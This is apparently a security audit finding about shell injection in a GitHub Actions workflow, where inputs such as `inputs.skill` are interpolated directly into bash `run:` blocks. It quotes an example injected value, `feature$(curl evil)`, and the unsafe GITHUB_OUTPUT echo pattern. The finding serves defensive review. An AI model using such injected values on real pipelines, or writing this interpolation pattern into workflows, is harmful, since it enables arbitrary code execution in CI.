Skill-name template interpolation in `run:` blocks enables shell injection from workflow_dispatch inputs

• .github/workflows/aeon.yml:81-82
• .github/workflows/aeon.yml:120-122
• .github/workflows/aeon.yml:174-175
• .github/workflows/aeon.yml:254-256
• .github/workflows/aeon.yml:260-262

Many `run:` blocks embed `${{ inputs.skill }}`, `${{ inputs.model }}`, `${{ inputs.var }}`, and `${{ steps.skill.outputs.name }}` directly into bash script bodies via GitHub Actions template substitution. Although workflow_dispatch requires write access to trigger by default, GitHub published guidance treats template injection in run blocks as a class of risk because (a) the values are substituted before bash quoting, (b) the workflow also accepts `workflow_call` from other workflows, and (c) a malicious skill name like `feature$(curl evil)` would execute. The `Determine skill` step uses `echo "name=${{ inputs.skill }}" >> "$GITHUB_OUTPUT"` which is the canonical injection pattern — a value with newlines can inject arbitrary GITHUB_OUTPUT keys, and a value with `$(...)` is executed by bash. This is the well-known 'untrusted input in run script' anti-pattern.